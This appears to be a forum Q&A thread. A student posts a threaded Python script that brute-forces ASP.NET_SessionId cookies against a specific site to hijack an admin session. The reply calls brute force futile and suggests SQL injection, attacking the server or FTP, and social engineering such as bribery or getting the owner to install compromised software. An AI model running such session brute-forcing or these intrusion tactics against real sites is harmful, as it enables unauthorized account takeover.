asp.net hack possibility of sessionId being brute forced using python script

Question

i am a newbie here. i am studying pentesting for my college project and want to develop a future in the same. i have a site hosted by my friend (under mutual consent) he has challenged me to hack into it. it is a simple site in asp.net probably 2.0 It uses a form to log into the site. in my understanding he is generating ASP.NET_SessionId to store authentication. i tried to sign out from the site but the cookie did not expire. now i want to try and login into the admin account using the same method. i am not aware as to where he is logging in from as the admin. i wrote this brute force python script to do the same, with 50 threads. as if i spawn more than 50 then the sessions start to get timed out.

#!/usr/bin/python
import urllib2
import string
import itertools
import threading

threadLimiter = threading.BoundedSemaphore(50)

class checkPage(threading.Thread):
    def __init__(self,sessionID):
        threading.Thread.__init__(self)
            self.sessionID=sessionID
    def run(self):
        threadLimiter.acquire()
        try:
             opener = urllib2.build_opener()
             opener.addheaders.append(('Cookie', 'ASP.NET_SessionId='+self.sessionID))
             f = opener.open("http://mysite.webber.org/default.aspx")
             page = f.read()
             f.close()
             #if logged in write to file
             if 'Welcome' in page:
                 k = open("session.txt","a")
                 k.write(self.sessionID+'\n')
                 k.close()
        finally:
            threadLimiter.release()

count = 0   
for state in itertools.product('abcdefghijklmnopqrstuvwxyz012345', repeat=24): 
     sessionID = ''.join(state)
     try:   
         thread=checkPage(sessionID)
         thread.start()
     except:
         print "thread cannot be started"
         break
     if count==50:
         thread.join()
         count = 0
    count += 1

as per ASP.net the session id is generated by CreateSessionId function and gives an output of 24 bytes with a-z and 0-5.

i intend to steal admin session ID and then use it again to login into the page and gain admin access.

is it a correct approach?

i figure this brute force will probably take forever. what is my best option to reduce the brute force time

thank you.

Answer 1

Brute forcing sucks.

No really it sucks lemons.

The whole idea behind security is not to keep people out but it keep people out long enough that they get bored, or you spot them breaking in. Also session cookies are something that is generated server side then given to the client, so the odds of you brute forcing one of these cookies that is in use at that given moment is unlikely to say the least.

It might be a good idea to consider the alternatives.

1. Target the box itself

   This is a viable alternative, rather than targeting your effort at the website to try and find a vulnerability there, it might save you time and effort to go after an insecure box directly. Perhaps exploiting insecure password policies, or attacking more insecure services like FTP would yield better results

2. SQL

   Oh SQL where do I start. Most of the world seems to be running you these days, and a large majority of website still don't sanitise input correctly. It might be a case you can do SQL injection on the username box, no hard work is needed you can either violate the SQL server or just get dumps of the database or even insert records into the database when you figure out the schema.

3. Social Engineering

   Never ignore this aspect of security, humans have a price and you can buy anyone for the right amount. For this reason you could always pay him for admin access, pay him to set the password to something you know, trick him into revealing his password directly. Or get him to install compromised software on the box.

There are so many other possible attack vectors that this list could go on for a while, hence why I will keep it short and to the point. These should give you some ideas that when doing a pen test or an audit, its a good idea to keep an open mind about your target. Just remember the golden rule.

Keep things simple. Stupid.